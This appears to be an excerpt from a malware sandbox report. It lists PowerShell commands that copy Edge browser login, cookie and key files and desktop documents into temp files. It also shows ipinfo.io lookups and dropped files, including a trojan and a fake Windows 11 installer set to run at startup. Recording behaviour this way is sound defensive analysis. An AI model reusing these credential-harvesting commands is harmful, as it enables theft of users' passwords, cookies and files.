"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\vhzjq0p3twn240741062.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\l6mrxkjyktx240741062.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\4kqxrdxny0240741156.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\0dsbrq84ff6u240741156.tmp\" -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\Desktop\BlockHide.M2TS\" \"C:\Users\Admin\AppData\Local\Temp\w6cae20njgw94pi5uw3kr8hk34.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\BlockPop.jpg\" \"C:\Users\Admin\AppData\Local\Temp\jjtzxmz59zyyz2nrn8h0v.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\BlockRedo.crw\" \"C:\Users\Admin\AppData\Local\Temp\f7jnqgmt7wcgwj6dq0o9.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CompressSave.DVR\" \"C:\Users\Admin\AppData\Local\Temp\d0yas27fwgf324tiv8yu9gjq2cda2.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CompressStop.gif\" \"C:\Users\Admin\AppData\Local\Temp\u60eqlkv72kuzf2o0z9te0d.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\DisconnectExpand.jpg\" \"C:\Users\Admin\AppData\Local\Temp\5xsnbobwf8hhgj9fyun0f6tzd05.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ExportUnprotect.pps\" \"C:\Users\Admin\AppData\Local\Temp\kakl6szvzqmrwl1zxl9azojz4.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\NewBackup.ram\" \"C:\Users\Admin\AppData\Local\Temp\9wuohmvd26ur9fiar3u605.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\OptimizeConvert.au\" \"C:\Users\Admin\AppData\Local\Temp\l08pizqa7zhc9gnefvbec3tkq1.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\PopAssert.clr\" \"C:\Users\Admin\AppData\Local\Temp\154zpnv0d74nnk9ehz5lk5x.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\RegisterResize.docx\" \"C:\Users\Admin\AppData\Local\Temp\chisdkm4kxsbov24b02f.tmp\" -Force"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipINFO.io | udp |
| US | 34.117.59.81:80 | ipINFO.io | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:50279 | | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\is-U7LE5.tmp\Trojan.Win32.DelShad.tmp
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\pik.exe
C:\tmp\.vbs
C:\tmp\.cmd
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk
C:\Windows\system32\drivers\etc\hosts
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\.cmd
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
C:\Users\Admin\AppData\Local\Temp\3k1f5r2b.tmp
C:\Users\Admin\AppData\Local\Temp\autA077.tmp
C:\Users\Admin\AppData\Local\Temp\autA076.tmp
C:\Users\Admin\AppData\Local\Temp\autA078.tmp
C:\Windows\Temp\4o8h4w8u.tmp
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
C:\Users\Admin\AppData\Local\Temp\write.zip
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4nuqozks.0hv.ps1
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
\??\PIPE\srvsvc
C:\Users\Admin\AppData\Local\Temp\5k7wtl346v6wd4ynfi3pq16l.tmp